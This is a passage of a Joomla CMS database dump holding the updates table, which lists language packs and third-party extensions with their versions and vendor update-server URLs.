Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31285,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31286,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31287,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31288,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31289,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31290,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31291,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31292,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31293,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31294,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31295,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31296,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31297,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31298,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31299,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31300,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31301,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31302,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31303,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31304,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31305,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31306,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31307,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31308,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31309,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31310,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31311,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31312,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31313,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31314,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31315,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31316,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31317,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31318,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31319,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31320,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31321,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31322,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31323,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31324,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(31325,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31326,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31327,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31328,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31329,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31330,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31331,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31332,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31333,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31334,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31335,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31336,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31337,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31338,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31339,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31340,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31341,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31342,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31343,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31344,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31345,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31346,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31347,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31348,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31349,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31350,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31351,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31352,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31353,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31354,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31355,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31356,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31357,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31358,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31359,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31360,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31361,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31362,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31363,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31364,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31365,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31366,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31367,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31368,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31369,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31370,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31371,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31372,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31373,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31374,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31375,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31376,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31377,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31378,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31379,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31380,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31381,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31382,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31383,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31384,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31385,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31386,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31387,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31388,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31389,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31390,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31391,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31392,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31393,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31394,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31395,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31396,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31397,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31398,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31399,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31400,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31401,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31402,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31403,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31404,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31405,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31406,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31407,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31408,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31409,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31410,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31411,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31412,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31413,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31414,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31415,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31416,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31417,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31418,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31419,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31420,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31421,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31422,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31423,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31424,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31425,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31426,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31427,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31428,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31429,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31430,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31431,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31432,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31433,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31434,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31435,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31436,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31437,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31438,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31439,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31440,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31441,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31442,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31443,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31444,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31445,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31446,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31447,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31448,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31449,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31450,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31451,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31452,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.14','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-14.html',''),(31453,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(31454,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31455,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31456,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31457,1,0,'Joomla','','joomla','file','',0,'3.10.4','','https://update.joomla.org/core/extension.xml','',''),(31458,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31459,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31460,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31461,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31462,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31463,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31464,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31465,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31466,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31467,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31468,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31469,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31470,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31471,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31472,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31473,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31474,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31475,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31476,3,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31477,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31478,3,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31479,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31480,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31481,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31482,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31483,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31484,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31485,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31486,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31487,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31488,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31489,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31490,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31491,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31492,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31493,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31494,3,0,'Portuguese, 